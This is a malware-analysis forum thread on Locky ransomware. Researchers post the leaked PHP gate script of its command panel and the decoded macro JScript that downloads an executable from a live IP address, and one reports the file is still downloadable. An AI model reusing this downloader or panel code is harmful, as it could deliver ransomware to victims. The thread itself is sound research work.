A forum for reverse engineering, OS internals and malware analysis 

Locky ransomware

Forum for analysis and discussion about malware.

Re: Locky ransomware

 #27893  by benkow_
 Thu Feb 18, 2016 8:49 am
Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

Re: Locky ransomware

 #27897  by eli
 Thu Feb 18, 2016 12:43 pm
Seems like it stopped working. Servers taken down?

Re: Locky ransomware

 #27924  by frank_boldewin
 Tue Feb 23, 2016 4:23 pm
eli wrote:Seems like it stopped working. Servers taken down?
maddog4012's doc file starts a macro with some ofuscated vb-code and decodes to following code:
Code: Select all
function downloadToFile(url,file)
{
	var xhr=new ActiveXObject("msxml2.xmlhttp");
	ado=new ActiveXObject("ADODB.Stream");
	xhr.open("GET",url,false);
	xhr.send();
	if(xhr.status===200)
	{
		ado.type=1;
		ado.open();
		ado.write(xhr.responseBody);
		ado.saveToFile(file);
		ado.close();
		return xhr.responseBody; 
	}
}

downloadToFile('http://66.133.129.5/~chuckgilbert/09u8h76f/65fg67n',fundamentally);
The executable can still be downloaded.

Re: Locky ransomware

 #27934  by w0rm
 Wed Feb 24, 2016 5:38 pm
There seems to be a version with a new DGA but I don't have access to the sample. Can anyone retrieve it?

73304ca4e455286b7a63ed71af48390a

Bonus points for unpacked =)

Re: Locky ransomware

 #27950  by p1nk
 Fri Feb 26, 2016 7:12 am
benkow_ wrote:Not really usefull but during some minutes, the panel server has some problem and we was been able to download php files.
gates: (main.php)
Code: Select all
<?php
declare(strict_types=1);
require_once(__DIR__.'/settings.php');
require_once(__DIR__.'/functions.php');

if (!isset($_SERVER['REQUEST_METHOD']) || $_SERVER['REQUEST_METHOD'] != 'POST') exit_error(404);
if (!($data = @file_get_contents('php://input'))) exit_error(404);
parse_str(decrypt_bot_request($data), $_POST);
if (empty($_POST['id']) || empty($_POST['act'])) exit_error(404);
$id = get_id();

/*
$data = print_r($_POST, true);
$fh = fopen('ppplog', 'a');
fwrite($fh, $data."\n----------------------------\n");
fclose($fh);
*/

$script = __DIR__.'/actions/'.trim(basename($_POST['act'])).'.php';
if (!@file_exists($script)) exit_error(404);
require_once($script);
?>

Do you have an archive of all the collected PHP pages?
  • 1
  • 2
  • 3
  • 4
  • 5
  • 15
 Return to “Malware”